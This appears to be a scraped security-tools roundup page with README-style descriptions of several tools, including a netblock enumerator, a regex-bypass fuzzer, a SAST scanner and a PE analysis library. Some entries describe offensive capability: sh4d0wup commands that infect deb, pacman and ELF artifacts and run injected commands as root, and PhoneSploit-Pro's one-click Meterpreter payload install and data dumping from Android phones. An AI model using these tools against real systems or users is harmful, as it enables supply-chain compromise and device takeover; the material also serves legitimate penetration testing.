Uncomment and configure the proxy env variables for the Clair and Kubei deployments in deploy/kubei.yaml.

Limitations
  1. Supports Kubernetes Image Manifest V 2, Schema 2 (https://docs.docker.com/registry/spec/manifest-v2-2/). It will fail to scan on earlier versions.
  2. The CVE database will update once a day.


hardCIDR - Linux Bash Script To Discover The Netblocks, Or Ranges, Owned By The Target Organization

By: Zion3R


A Linux Bash script to discover the netblocks, or ranges, (in CIDR notation) owned by the target organization during the intelligence gathering phase of a penetration test. This information is maintained by the five Regional Internet Registries (RIRs):

ARIN (North America)
RIPE (Europe/Asia/Middle East)
APNIC (Asia/Pacific)
LACNIC (Latin America)
AfriNIC (Africa)

In addition to netblocks and IP addresses, Autonomous System Numbers (ASNs) are also of interest. ASNs are used as part of the Border Gateway Protocol (BGP) for uniquely identifying each network on the Internet. Target organizations may have their own ASNs due to the size of their network or as a result of redundant service paths from peered service providers. These ASNs will reveal additional netblocks owned by the organization.


Requirements

ipcalc (for RIPE, APNIC, LACNIC, AfriNIC queries)

LACNIC

A note on LACNIC before diving into the usage. LACNIC only allows query of either network range, ASN, Org Handle, or PoC Handle. This does not help us in locating these values based upon the organization name. They do however publish a list of all assigned ranges on a publically accessible FTP server, along with their rate-limiting thresholds. So, there is an accompanying data file, which the script checks for, used to perform LACNIC queries locally. The script includes an update option -r, that can be used to update this data on an interval of your choosing. Approximate run time is just shy of 28 hours.

Usage

The script with no specified options will query ARIN and a pool of BGP route servers. The route server is selected at random at runtime. The -h option lists the help:

The options may be used in any combination, all, or none. Unfortunately, none of the โ€œotherโ€ RIRs note the actual CIDR notation of the range, so ipcalc is used to perform this function. If it is not installed on your system, the script will install it for you.

At the prompts, enter the organization name, the email domain, and whether country codes are used as part of the email. If answered Y to country codes, you will be prompted as to whether they precede the domain name or are appended to the TLD. A directory will be created for the output files in /tmp/. If the directory is found to exist, you will be prompted whether to overwrite. If answered N, a time stamp will be appended to the directory name.

The script queries each RIR, as well as a BGP route server, prompting along the way as to whether records were located. Upon completion, three files will be generated: a CSV based on Org Handle, a CSV based on PoC Handle, and a line delimited file of all located raanges in CIDR notation.

Cancelling the script at any time will remove any temporary working files and the directory created for the resultant output files.

It should be noted that, due to similarity in some organization names, you could get back results not related to the target. The CSV files will provide the associated handles and URLs for further validation where necessary. It is also possible that employees of the target organization used their corporate email address to register their own domains. These will be found within the results as well.

Running with Docker

docker build -t hardcidr .

Building the hardcidr image

docker run -v $(pwd):/tmp -it hardcidr

Running the container. Output will be saved to current directory

Additional Information

For more information, check out the blog post on the TrustedSec website: Classy Inter-Domain Routing Enumeration



Clam AntiVirus Toolkit 1.1.0

Clam AntiVirus is an anti-virus toolkit for Unix. The main purpose of this software is the integration with mail servers (attachment scanning). The package provides a flexible and scalable multi-threaded daemon, a command-line scanner, and a tool for automatic updating via Internet. The programs are based on a shared library distributed with the Clam AntiVirus package, which you can use in your own software. This is the LTS source code release.

MIMEDefang Email Scanner 3.4.1

MIMEDefang is a flexible MIME email scanner designed to protect Windows clients from viruses. Includes the ability to do many other kinds of mail processing, such as replacing parts of messages with URLs. It can alter or delete various parts of a MIME message according to a very flexible configuration file. It can also bounce messages with unacceptable attachments. MIMEDefang works with the Sendmail 8.11 and newer "Milter" API, which makes it more flexible and efficient than procmail-based approaches.

REcollapse Is A Helper Tool For Black-Box Regex Fuzzing To Bypass Validations And Discover Normalizations In Web Applications

By: Zion3R


REcollapse is a helper tool for black-box regex fuzzing to bypass validations and discover normalizations in web applications.

It can also be helpful to bypass WAFs and weak vulnerability mitigations. For more information, take a look at the REcollapse blog post.

The goal of this tool is to generate payloads for testing. Actual fuzzing shall be done with other tools like Burp (intruder), ffuf, or similar.


Installation

Requirements: Python 3

pip3 install --user --upgrade -r requirements.txt or ./install.sh

Docker

docker build -t recollapse . or docker pull 0xacb/recollapse


Usage

$ recollapse -h
usage: recollapse [-h] [-p POSITIONS] [-e {1,2,3}] [-r RANGE] [-s SIZE] [-f FILE]
[-an] [-mn MAXNORM] [-nt]
[input]

REcollapse is a helper tool for black-box regex fuzzing to bypass validations and
discover normalizations in web applications

positional arguments:
input original input

options:
-h, --help show this help message and exit
-p POSITIONS, --positions POSITIONS
pivot position modes. Example: 1,2,3,4 (default). 1: starting,
2: separator, 3: normalization, 4: termination
-e {1,2,3}, --encoding {1,2,3}
1: URL-encoded format (default), 2: Unicode format, 3: Raw
format
-r RANGE, --range RANGE
range of bytes for fuzzing. Example: 0,0xff (default)
-s SIZE, --size SIZE numb er of fuzzing bytes (default: 1)
-f FILE, --file FILE read input from file
-an, --alphanum include alphanumeric bytes in fuzzing range
-mn MAXNORM, --maxnorm MAXNORM
maximum number of normalizations (default: 3)
-nt, --normtable print normalization table

Detailed options explanation

Let's consider this_is.an_example as the input.

Positions

  1. Fuzz the beginning of the input: $this_is.an_example
  2. Fuzz the before and after special characters: this$_$is$.$an$_$example
  3. Fuzz normalization positions: replace all possible bytes according to the normalization table
  4. Fuzz the end of the input: this_is.an_example$

Encoding

  1. URL-encoded format to be used with application/x-www-form-urlencoded or query parameters: %22this_is.an_example
  2. Unicode format to be used with application/json: \u0022this_is.an_example
  3. Raw format to be used with multipart/form-data: "this_is.an_example

Range

Specify a range of bytes for fuzzing: -r 1-127. This will exclude alphanumeric characters unless the -an option is provided.

Size

Specify the size of fuzzing for positions 1, 2 and 4. The default approach is to fuzz all possible values for one byte. Increasing the size will consume more resources and generate many more inputs, but it can lead to finding new bypasses.

File

Input can be provided as a positional argument, stdin, or a file through the -f option.

Alphanumeric

By default, alphanumeric characters will be excluded from output generation, which is usually not interesting in terms of responses. You can allow this with the -an option.

Maximum number or normalizations

Not all normalization libraries have the same behavior. By default, three possibilities for normalizations are generated for each input index, which is usually enough. Use the -mn option to go further.

Normalization table

Use the -nt option to show the normalization table.


Example

$ recollapse -e 1 -p 1,2,4 -r 10-11 https://legit.example.com
%0ahttps://legit.example.com
%0bhttps://legit.example.com
https%0a://legit.example.com
https%0b://legit.example.com
https:%0a//legit.example.com
https:%0b//legit.example.com
https:/%0a/legit.example.com
https:/%0b/legit.example.com
https://%0alegit.example.com
https://%0blegit.example.com
https://legit%0a.example.com
https://legit%0b.example.com
https://legit.%0aexample.com
https://legit.%0bexample.com
https://legit.example%0a.com
https://legit.example%0b.com
https://legit.example.%0acom
https://legit.example.%0bcom
https://legit.example.com%0a
https://legit.example.com%0b

Resources

This technique has been presented on BSidesLisbon 2022

Blog post: https://0xacb.com/2022/11/21/recollapse/

Slides:

Videos:

Normalization table: https://0xacb.com/normalization_table


Thanks

and



Sh4D0Wup - Signing-key Abuse And Update Exploitation Framework


Signing-key abuse and update exploitation framework.

% docker run -it --rm ghcr.io/kpcyrd/sh4d0wup:edge -h
Usage: sh4d0wup [OPTIONS] <COMMAND>

Commands:
bait Start a malicious update server
front Bind a http/https server but forward everything unmodified
infect High level tampering, inject additional commands into a package
tamper Low level tampering, patch a package database to add malicious packages, cause updates or influence dependency resolution
keygen Generate signing keys with the given parameters
sign Use signing keys to generate signatures
hsm Interact with hardware signing keys
build Compile an attack based on a plot
check Check if the plot can still execute correctly against the configured image
req Emulate a http request to test routing and selectors
completion s Generate shell completions
help Print this message or the help of the given subcommand(s)

Options:
-v, --verbose... Increase logging output (can be used multiple times)
-q, --quiet... Reduce logging output (can be used multiple times)
-h, --help Print help information
-V, --version Print version information

What are shadow updates?

Have you ever wondered if the update you downloaded is the same one everybody else gets or did you get a different one that was made just for you? Shadow updates are updates that officially don't exist but carry valid signatures and would get accepted by clients as genuine. This may happen if the signing key is compromised by hackers or if a release engineer with legitimate access turns grimy.

sh4d0wup is a malicious http/https update server that acts as a reverse proxy in front of a legitimate server and can infect + sign various artifact formats. Attacks are configured in plots that describe how http request routing works, how artifacts are patched/generated, how they should be signed and with which key. A route can have selectors so it matches only if eg. the user-agent matches a pattern or if the client is connecting from a specific ip address. For development and testing, mock signing keys/certificates can be generated and marked as trusted.

Compile a plot

Some plots are more complex to run than others, to avoid long startup time due to downloads and artifact patching, you can build a plot in advance. This also allows to create signatures in advance.

sh4d0wup build ./contrib/plot-hello-world.yaml -o ./plot.tar.zst

Run a plot

This spawns a malicious http update server according to the plot. This also accepts yaml files but they may take longer to start.

sh4d0wup bait -B 0.0.0.0:1337 ./plot.tar.zst

You can find examples here:

Infect an artifact

sh4d0wup infect elf

% sh4d0wup infect elf /usr/bin/sh4d0wup -c id a.out
[2022-12-19T23:50:52Z INFO sh4d0wup::infect::elf] Spawning C compiler...
[2022-12-19T23:50:52Z INFO sh4d0wup::infect::elf] Generating source code...
[2022-12-19T23:50:57Z INFO sh4d0wup::infect::elf] Waiting for compile to finish...
[2022-12-19T23:51:01Z INFO sh4d0wup::infect::elf] Successfully generated binary
% ./a.out help
uid=1000(user) gid=1000(user) groups=1000(user),212(rebuilderd),973(docker),998(wheel)
Usage: a.out [OPTIONS] <COMMAND>

Commands:
bait Start a malicious update server
infect High level tampering, inject additional commands into a package
tamper Low level tampering, patch a package database to add malicious packages, cause updates or influence dependency resolution
keygen Generate signing keys with the given parameters
sign Use signing keys to generate signatures
hsm Intera ct with hardware signing keys
build Compile an attack based on a plot
check Check if the plot can still execute correctly against the configured image
completions Generate shell completions
help Print this message or the help of the given subcommand(s)

Options:
-v, --verbose... Turn debugging information on
-h, --help Print help information

sh4d0wup infect pacman

% sh4d0wup infect pacman --set 'pkgver=0.2.0-2' /var/cache/pacman/pkg/sh4d0wup-0.2.0-1-x86_64.pkg.tar.zst -c id sh4d0wup-0.2.0-2-x86_64.pkg.tar.zst
[2022-12-09T16:08:11Z INFO sh4d0wup::infect::pacman] This package has no install hook, adding one from scratch...
% sudo pacman -U sh4d0wup-0.2.0-2-x86_64.pkg.tar.zst
loading packages...
resolving dependencies...
looking for conflicting packages...

Packages (1) sh4d0wup-0.2.0-2

Total Installed Size: 13.36 MiB
Net Upgrade Size: 0.00 MiB

:: Proceed with installation? [Y/n]
(1/1) checking keys in keyring [#######################################] 100%
(1/1) checking package integrity [#######################################] 100%
(1/1) loading package files [#######################################] 100%
(1/1) checking for file conflic ts [#######################################] 100%
(1/1) checking available disk space [#######################################] 100%
:: Processing package changes...
(1/1) upgrading sh4d0wup [#######################################] 100%
uid=0(root) gid=0(root) groups=0(root)
:: Running post-transaction hooks...
(1/2) Arming ConditionNeedsUpdate...
(2/2) Notifying arch-audit-gtk

sh4d0wup infect deb

% sh4d0wup infect deb /var/cache/apt/archives/apt_2.2.4_amd64.deb -c id ./apt_2.2.4-1_amd64.deb --set Version=2.2.4-1
[2022-12-09T16:28:02Z INFO sh4d0wup::infect::deb] Patching "control.tar.xz"
% sudo apt install ./apt_2.2.4-1_amd64.deb
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Note, selecting 'apt' instead of './apt_2.2.4-1_amd64.deb'
Suggested packages:
apt-doc aptitude | synaptic | wajig dpkg-dev gnupg | gnupg2 | gnupg1 powermgmt-base
Recommended packages:
ca-certificates
The following packages will be upgraded:
apt
1 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Need to get 0 B/1491 kB of archives.
After this operation, 0 B of additional disk space will be used.
Get:1 /apt_2.2.4-1_amd64.deb apt amd64 2.2.4-1 [1491 kB]
debconf: de laying package configuration, since apt-utils is not installed
(Reading database ... 6661 files and directories currently installed.)
Preparing to unpack /apt_2.2.4-1_amd64.deb ...
Unpacking apt (2.2.4-1) over (2.2.4) ...
Setting up apt (2.2.4-1) ...
uid=0(root) gid=0(root) groups=0(root)
Processing triggers for libc-bin (2.31-13+deb11u5) ...

sh4d0wup infect oci

Bruteforce git commit partial collisions

Here's a short oneliner on how to take the latest commit from a git repository, send it to a remote computer that has sh4d0wup installed to tweak it until the commit id starts with the provided --collision-prefix and then inserts the new commit back into the repository on your local computer:

% git cat-file commit HEAD | ssh lots-o-time nice sh4d0wup tamper git-commit --stdin --collision-prefix 7777 --strip-header | git hash-object -w -t commit --stdin

This may take some time, eventually it shows a commit id that you can use to create a new branch:

git show 777754fde8...
git branch some-name 777754fde8...


FirebaseExploiter - Vulnerability Discovery Tool That Discovers Firebase Database Which Are Open And Can Be Exploitable


FirebaseExploiter is a vulnerability discovery tool that discovers Firebase Database which are open and can be exploitable. Primarily built for mass hunting bug bounties and for penetration testing.

Features

  • Mass vulnerability scanning from list of hosts
  • Custom JSON data in exploit.json to upload during exploit
  • Custom URI path for exploit

Usage

This will display help for the CLI tool. Here are all the required arguments it supports.

Installation

FirebaseExploiter was built using go1.19. Make sure you use latest version of Go to install successfully. Run the following command to install the latest version:

go install -v github.com/securebinary/firebaseExploiter@latest

Running FirebaseExploiter

To scan a specific domain to check for Insecure Firebase DB.

To exploit a Firebase DB to write your own JSON document in it.

Create your own exploit.json file in proper JSON format to exploit vulnerable Firebase DBs.

Checking the exploited URL to verify the vulnerability.

Adding custom path for exploiting Firebase DBs.

Mass scanning for Insecure Firebase Databases from list of target hosts.

Exploiting vulnerable Firebase DBs from the list of target hosts.

License

FirebaseExploiter is made with love by the SecureBinary team. Any tweaks / community contribution are welcome.


Bearer - Code Security Scanning Tool (SAST) That Discover, Filter And Prioritize Security Risks And Vulnerabilities Leading To Sensitive Data Exposures (PII, PHI, PD)


Discover, filter, and prioritize security risks and vulnerabilities impacting your code.

Bearer is a static application security testing (SAST) tool that scans your source code and analyzes your data flows to discover, filter and prioritize security risks and vulnerabilities leading to sensitive data exposures (PII, PHI, PD).

Currently supporting JavaScript and Ruby stacks.

Code security scanner that natively filters and prioritizes security risks using sensitive data flow analysis.

Bearer provides built-in rules against a common set of security risks and vulnerabilities, known as OWASP Top 10. Here are some practical examples of what those rules look for:

  • Non-filtered user input.
  • Leakage of sensitive data through cookies, internal loggers, third-party logging services, and into analytics environments.
  • Usage of weak encryption libraries or misusage of encryption algorithms.
  • Unencrypted incoming and outgoing communication (HTTP, FTP, SMTP) of sensitive information.
  • Hard-coded secrets and tokens.

And many more.

Bearer is Open Source (see license) and fully customizable, from creating your own rules to component detection (database, API) and data classification.

Bearer also powers our commercial offering, Bearer Cloud, allowing security teams to scale and monitor their application security program using the same engine.

Getting started

Discover your most critical security risks and vulnerabilities in only a few minutes. In this guide, you will install Bearer, run a scan on a local project, and view the results. Let's get started!

Install Bearer

The quickest way to install Bearer is with the install script. It will auto-select the best build for your architecture. Defaults installation to ./bin and to the latest release version:

curl -sfL https://raw.githubusercontent.com/Bearer/bearer/main/contrib/install.sh | sh

Other install options


Homebrew

Using Bearer's official Homebrew tap:

brew install bearer/tap/bearer

Debian/Ubuntu
$ sudo apt-get install apt-transport-https
$ echo "deb [trusted=yes] https://apt.fury.io/bearer/ /" | sudo tee -a /etc/apt/sources.list.d/fury.list
$ sudo apt-get update
$ sudo apt-get install bearer

RHEL/CentOS

Add repository setting:

$ sudo vim /etc/yum.repos.d/fury.repo
[fury]
name=Gemfury Private Repo
baseurl=https://yum.fury.io/bearer/
enabled=1
gpgcheck=0

Then install with yum:

  $ sudo yum -y update
$ sudo yum -y install bearer

Docker

Bearer is also available as a Docker image on Docker Hub and ghcr.io.

With docker installed, you can run the following command with the appropriate paths in place of the examples.

docker run --rm -v /path/to/repo:/tmp/scan bearer/bearer:latest-amd64 scan /tmp/scan

Additionally, you can use docker compose. Add the following to your docker-compose.yml file and replace the volumes with the appropriate paths for your project:

version: "3"
services:
bearer:
platform: linux/amd64
image: bearer/bearer:latest-amd64
volumes:
- /path/to/repo:/tmp/scan

Then, run the docker compose run command to run Bearer with any specified flags:

docker compose run bearer scan /tmp/scan --debug

Binary

Download the archive file for your operating system/architecture from here.

Unpack the archive, and put the binary somewhere in your $PATH (on UNIX-y systems, /usr/local/bin or the like). Make sure it has permission to execute.


Scan your project

The easiest way to try out Bearer is with our example project, Bear Publishing. It simulates a realistic Ruby application with common security flaws. Clone or download it to a convenient location to get started.

git clone https://github.com/Bearer/bear-publishing.git

Now, run the scan command with bearer scan on the project directory:

bearer scan bear-publishing

A progress bar will display the status of the scan.

Once the scan is complete, Bearer will output a security report with details of any rule failures, as well as where in the codebase the infractions happened and why.

By default the scan command use the SAST scanner, other scanner types are available.

Analyze the report

The security report is an easily digestible view of the security issues detected by Bearer. A report is made up of:

  • The list of rules run against your code.
  • Each detected failure, containing the file location and lines that triggered the rule failure.
  • A stat section with a summary of rules checks, failures and warnings.

The Bear Publishing example application will trigger rule failures and output a full report. Here's a section of the output:

...
CRITICAL: Only communicate using SFTP connections.
https://docs.bearer.com/reference/rules/ruby_lang_insecure_ftp

File: bear-publishing/app/services/marketing_export.rb:34

34 Net::FTP.open(
35 'marketing.example.com',
36 'marketing',
37 'password123'
...
41 end


=====================================

56 checks, 10 failures, 6 warnings

CRITICAL: 7
HIGH: 0
MEDIUM: 0
LOW: 3
WARNING: 6

The security report is just one report type available in Bearer.

Additional options for using and configuring the scan command can be found in the scan documentation.

For additional guides and usage tips, view the docs.

FAQs

How do you detect sensitive data flows from the code?

When you run Bearer on your codebase, it discovers and classifies data by identifying patterns in the source code. Specifically, it looks for data types and matches against them. Most importantly, it never views the actual values (it just canโ€™t)โ€”but only the code itself.

Bearer assesses 120+ data types from sensitive data categories such as Personal Data (PD), Sensitive PD, Personally identifiable information (PII), and Personal Health Information (PHI). You can view the full list in the supported data types documentation.

In a nutshell, our static code analysis is performed on two levels: Analyzing class names, methods, functions, variables, properties, and attributes. It then ties those together to detected data structures. It does variable reconciliation etc. Analyzing data structure definitions files such as OpenAPI, SQL, GraphQL, and Protobuf.

Bearer then passes this over to the classification engine we built to support this very particular discovery process.

If you want to learn more, here is the longer explanation.

When and where to use Bearer?

We recommend running Bearer in your CI to check new PR automatically for security issues, so your development team has a direct feedback loop to fix issues immediately.

You can also integrate Bearer in your CD, though we recommend to only make it fail on high criticality issues only, as the impact for your organization might be important.

In addition, running Bearer on a scheduled job is a great way to keep track of your security posture and make sure new security issues are found even in projects with low activity.

Supported Language

Bearer currently supports JavaScript and Ruby and their associated most used frameworks and libraries. More languages will follow.

What makes Bearer different from any other SAST tools?

SAST tools are known to bury security teams and developers under hundreds of issues with little context and no sense of priority, often requiring security analysts to triage issues. Not Bearer.

The most vulnerable asset today is sensitive data, so we start there and prioritize application security risks and vulnerabilities by assessing sensitive data flows in your code to highlight what is urgent, and what is not.

We believe that by linking security issues with a clear business impact and risk of a data breach, or data leak, we can build better and more robust software, at no extra cost.

In addition, by being Open Source, extendable by design, and built with a great developer UX in mind, we bet you will see the difference for yourself.

How long does it take to scan my code? Is it fast?

It depends on the size of your applications. It can take as little as 20 seconds, up to a few minutes for an extremely large code base. Weโ€™ve added an internal caching layer that only looks at delta changes to allow quick, subsequent scans.

Running Bearer should not take more time than running your test suite.

What about false positives?

If youโ€™re familiar with other SAST tools, false positives are always a possibility.

By using the most modern static code analysis techniques and providing a native filtering and prioritizing solution on the most important issues, we believe this problem wonโ€™t be a concern when using Bearer.

Get in touch

Thanks for using Bearer. Still have questions?

Contributing

Interested in contributing? We're here for it! For details on how to contribute, setting up your development environment, and our processes, review the contribution guide.

Code of conduct

Everyone interacting with this project is expected to follow the guidelines of our code of conduct.

Security

To report a vulnerability or suspected vulnerability, see our security policy. For any questions, concerns or other security matters, feel free to open an issue or join the Discord Community.



MIMEDefang Email Scanner 3.4

MIMEDefang is a flexible MIME email scanner designed to protect Windows clients from viruses. Includes the ability to do many other kinds of mail processing, such as replacing parts of messages with URLs. It can alter or delete various parts of a MIME message according to a very flexible configuration file. It can also bounce messages with unacceptable attachments. MIMEDefang works with the Sendmail 8.11 and newer "Milter" API, which makes it more flexible and efficient than procmail-based approaches.

PhoneSploit-Pro - An All-In-One Hacking Tool To Remotely Exploit Android Devices Using ADB And Metasploit-Framework To Get A Meterpreter Session


An all-in-one hacking tool written in Python to remotely exploit Android devices using ADB (Android Debug Bridge) and Metasploit-Framework.

Complete Automation to get a Meterpreter session in One Click

This tool can automatically Create, Install, and Run payload on the target device using Metasploit-Framework and ADB to completely hack the Android Device in one click.

The goal of this project is to make penetration testing on Android devices easy. Now you don't have to learn commands and arguments, PhoneSploit Pro does it for you. Using this tool, you can test the security of your Android devices easily.

PhoneSploit Pro can also be used as a complete ADB Toolkit to perform various operations on Android devices over Wi-Fi as well as USB.

ย 

Features

v1.0

  • Connect device using ADB remotely.
  • List connected devices.
  • Disconnect all devices.
  • Access connected device shell.
  • Stop ADB Server.
  • Take screenshot and pull it to computer automatically.
  • Screen Record target device screen for a specified time and automatically pull it to computer.
  • Download file/folder from target device.
  • Send file/folder from computer to target device.
  • Run an app.
  • Install an APK file from computer to target device.
  • Uninstall an app.
  • List all installed apps in target device.
  • Restart/Reboot the target device to System, Recovery, Bootloader, Fastboot.
  • Hack Device Completely :
    • Automatically fetch your IP Address to set LHOST.
    • Automatically create a payload using msfvenom, install it, and run it on target device.
    • Then automatically launch and setup Metasploit-Framework to get a meterpreter session.
    • Getting a meterpreter session means the device is completely hacked using Metasploit-Framework, and you can do anything with it.

v1.1

  • List all files and folders of the target devices.
  • Copy all WhatsApp Data to computer.
  • Copy all Screenshots to computer.
  • Copy all Camera Photos to computer.
  • Take screenshots and screen-record anonymously (Automatically delete file from target device).
  • Open a link on target device.
  • Display an image/photo on target device.
  • Play an audio on target device.
  • Play a video on target device.
  • Get device information.
  • Get battery information.
  • Use Keycodes to control device remotely.

v1.2

  • Send SMS through target device.
  • Unlock device (Automatic screen on, swipe up and password input).
  • Lock device.
  • Dump all SMS from device to computer.
  • Dump all Contacts from device to computer.
  • Dump all Call Logs from device to computer.
  • Extract APK from an installed app.

v1.3

  • Mirror and Control the target device.

v1.4

  • Power off the target device.

Requirements

Run PhoneSploit Pro

PhoneSploit Pro does not need any installation and runs directly using python3

On Linux / macOS :

Make sure all the required software are installed.

Open terminal and paste the following commands :

git clone https://github.com/AzeemIdrisi/PhoneSploit-Pro.git
cd PhoneSploit-Pro/
python3 phonesploitpro.py

On Windows :

Make sure all the required software are installed.

Open terminal and paste the following commands :

git clone https://github.com/AzeemIdrisi/PhoneSploit-Pro.git
cd PhoneSploit-Pro/
  1. Download and extract latest platform-tools from here.

  2. Copy all files from the extracted platform-tools or adb directory to PhoneSploit-Pro directory and then run :

python phonesploitpro.py

Screenshots

Installing ADB

ADB on Linux :

Open terminal and paste the following commands :

  • Debian / Ubuntu
sudo apt update
sudo apt install adb
  • Fedora
sudo dnf install adb
  • Arch Linux / Manjaro
sudo pacman -Sy android-tools

For other Linux Distributions : Visit this Link

ADB on macOS :

Open terminal and paste the following command :

brew install android-platform-tools

or Visit this link : Click Here

ADB on Windows :

Visit this link : Click Here

ADB on Termux :

pkg update
pkg install android-tools

Installing Metasploit-Framework

On Linux / macOS :

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
chmod 755 msfinstall && \
./msfinstall

or Follow this link : Click Here

or Visit this link : Click Here

On Windows :

Visit this link : Click Here

or Follow this link : Click Here

Installing scrcpy

Visit the scrcpy GitHub page for latest installation instructions : Click Here

On Windows : Copy all the files from the extracted scrcpy folder to PhoneSploit-Pro folder.

If scrcpy is not available for your Linux distro, then you can build it with a few simple steps : Build Guide

Tutorial

Setting up Android Phone for the first time

  • Enabling the Developer Options
  1. Open Settings.
  2. Go to About Phone.
  3. Find Build Number.
  4. Tap on Build Number 7 times.
  5. Enter your pattern, PIN or password to enable the Developer options menu.
  6. The Developer options menu will now appear in your Settings menu.
  • Enabling USB Debugging
  1. Open Settings.
  2. Go to System > Developer options.
  3. Scroll down and Enable USB debugging.
  • Connecting with Computer
  1. Connect your Android device and adb host computer to a common Wi-Fi network.
  2. Connect the device to the host computer with a USB cable.
  3. Open terminal in the computer and enter the following command :
adb devices
  1. A pop-up will appear in the Android phone when you connect your phone to a new PC for the first time : Allow USB debugging?.
  2. Click on Always allow from this computer check-box and then click Allow.
  3. Then enter the following command :
adb tcpip 5555
  1. Now you can connect the Android Phone over Wi-Fi.
  2. Disconnect the USB cable.
  3. Go to Settings > About Phone > Status > IP address and note the phone's IP Address.
  4. Run PhoneSploit Pro and select Connect a device and enter the target's IP Address to connect over Wi-Fi.

Connecting the Android phone for the next time

  1. Connect your Android device and host computer to a common Wi-Fi network.
  2. Run PhoneSploit Pro and select Connect a device and enter the target's IP Address to connect over Wi-Fi.

This tool is tested on

  • โœ…Ubuntu
  • โœ…Linux Mint
  • โœ…Kali Linux
  • โœ…Fedora
  • โœ…Arch Linux
  • โœ…Parrot Security OS
  • โœ…Windows 11
  • โœ…Termux (Android)

All the new features are primarily tested on Linux, thus Linux is recommended for running PhoneSploit Pro. Some features might not work properly on Windows.

Disclaimer

  • Neither the project nor its developer promote any kind of illegal activity and are not responsible for any misuse or damage caused by this project.
  • This project is for the purpose of penetration testing only.
  • Please do not use this tool on other people's devices without their permission.
  • Do not use this tool to harm others.
  • Use this project responsibly on your own devices only.
  • It is the end user's responsibility to obey all applicable local, state, federal, and international laws.


PortEx - Java Library To Analyse Portable Executable Files With A Special Focus On Malware Analysis And PE Malformation Robustness


PortEx is a Java library for static malware analysis of Portable Executable files. Its focus is on PE malformation robustness, and anomaly detection. PortEx is written in Java and Scala, and targeted at Java applications.

Features

  • Reading header information from: MSDOS Header, COFF File Header, Optional Header, Section Table
  • Reading PE structures: Imports, Resources, Exports, Debug Directory, Relocations, Delay Load Imports, Bound Imports
  • Dumping of sections, resources, overlay, embedded ZIP, JAR or .class files
  • Scanning for file format anomalies, including structural anomalies, deprecated, reserved, wrong or non-default values.
  • Visualize PE file structure, local entropies and byteplot of the file with variable colors and sizes
  • Calculate Shannon Entropy and Chi Squared for files and sections
  • Calculate ImpHash and Rich and RichPV hash values for files and sections
  • Parse RichHeader and verify checksum
  • Calculate and verify Optional Header checksum
  • Scan for PEiD signatures, internal file type signatures or your own signature database
  • Scan for Jar to EXE wrapper (e.g. exe4j, jsmooth, jar2exe, launch4j)
  • Extract Unicode and ASCII strings contained in the file
  • Extraction and conversion of .ICO files from icons in the resource section
  • Extraction of version information and manifest from the file
  • Reading .NET metadata and streams (Alpha)

For more information have a look at PortEx Wiki and the Documentation

PortexAnalyzer CLI and GUI

PortexAnalyzer CLI is a command line tool that runs the library PortEx under the hood. If you are looking for a readily compiled command line PE scanner to analyse files with it, download it from here PortexAnalyzer.jar

The GUI version is available here: PortexAnalyzerGUI

Using PortEx

Including PortEx to a Maven Project

You can include PortEx to your project by adding the following Maven dependency:

<dependency>
<groupId>com.github.katjahahn</groupId>
<artifactId>portex_2.12</artifactId>
<version>4.0.0</version>
</dependency>

To use a local build, add the library as follows:

<dependency>
<groupId>com.github.katjahahn</groupId>
<artifactId>portex_2.12</artifactId>
<version>4.0.0</version>
<scope>system</scope>
<systemPath>$PORTEXDIR/target/scala-2.12/portex_2.12-4.0.0.jar</systemPath>
</dependency>

Including PortEx to an SBT project

Add the dependency as follows in your build.sbt

libraryDependencies += "com.github.katjahahn" % "portex_2.12" % "4.0.0"

Building PortEx

Requirements

PortEx is build with sbt

Compile and Build With sbt

To simply compile the project invoke:

$ sbt compile

To create a jar:

$ sbt package

To compile a fat jar that can be used as command line tool, type:

$ sbt assembly

Create Eclipse Project

You can create an eclipse project by using the sbteclipse plugin. Add the following line to project/plugins.sbt:

addSbtPlugin("com.typesafe.sbteclipse" % "sbteclipse-plugin" % "2.4.0")

Generate the project files for Eclipse:

$ sbt eclipse

Import the project to Eclipse via the Import Wizard.

Donations

I develop PortEx and PortexAnalyzer as a hobby in my freetime. If you like it, please consider buying me a coffee: https://ko-fi.com/struppigel

Author

Karsten Hahn

Twitter: @Struppigel

Mastodon: struppigel@infosec.exchange

Youtube: MalwareAnalysisForHedgehogs



auditpolCIS - CIS Benchmark Testing Of Windows SIEM Configuration


CIS Benchmark testing of Windows SIEM configuration

This is an application for testing the configuration of Windows Audit Policy settings against the CIS Benchmark recommended settings. A few points:

  • The tested system was Windows Server 2019, and the benchmark used was also Windows Server 2019.
  • The script connects with SSH. SSH is included with Windows Server 2019, it just has to be enabled. If you would like to see WinRM (or other) connection types, let me know or send a PR.
  • Some tests are included here which were not included in the CIS guide. The recommended settings for these Subcategories are based on the logging volume for these events, versus the security value. In nearly all cases, the recommendation is to turn off auditing for these settings.
  • The YAML file cis-benchmarks.yaml is the YAML representation of the CIS Benchmark guideline for each Subcategory.
  • The command run under SSH is auditpol /get /category:*


Further details on usage and other background info is at https://www.seven-stones.biz/blog/auditpolcis-automating-windows-siem-cis-benchmarks-testing/



KubeStalk - Discovers Kubernetes And Related Infrastructure Based Attack Surface From A Black-Box Perspective

ย 


KubeStalk is a tool to discover Kubernetes and related infrastructure based attack surface from a black-box perspective. This tool is a community version of the tool used to probe for unsecured Kubernetes clusters around the internet during Project Resonance - Wave 9.


Usage

The GIF below demonstrates usage of the tool:


Installation

KubeStalk is written in Python and requires the requests library.

To install the tool, you can clone the repository to any directory:

git clone https://github.com/redhuntlabs/kubestalk

Once cloned, you need to install the requests library using python3 -m pip install requests or:

python3 -m pip install -r requirements.txt

Everything is setup and you can use the tool directly.

Command-line Arguments

A list of command line arguments supported by the tool can be displayed using the -h flag.

$ python3 kubestalk.py  -h

+---------------------+
| K U B E S T A L K |
+---------------------+ v0.1

[!] KubeStalk by RedHunt Labs - A Modern Attack Surface (ASM) Management Company
[!] Author: 0xInfection (RHL Research Team)
[!] Continuously Track Your Attack Surface using https://redhuntlabs.com/nvadr.

usage: ./kubestalk.py <url(s)>/<cidr>

Required Arguments:
urls List of hosts to scan

Optional Arguments:
-o OUTPUT, --output OUTPUT
Output path to write the CSV file to
-f SIG_FILE, --sig-dir SIG_FILE
Signature directory path to load
-t TIMEOUT, --timeout TIMEOUT
HTTP timeout value in seconds
-ua USER_AGENT, --user-agent USER_AGENT
User agent header t o set in HTTP requests
--concurrency CONCURRENCY
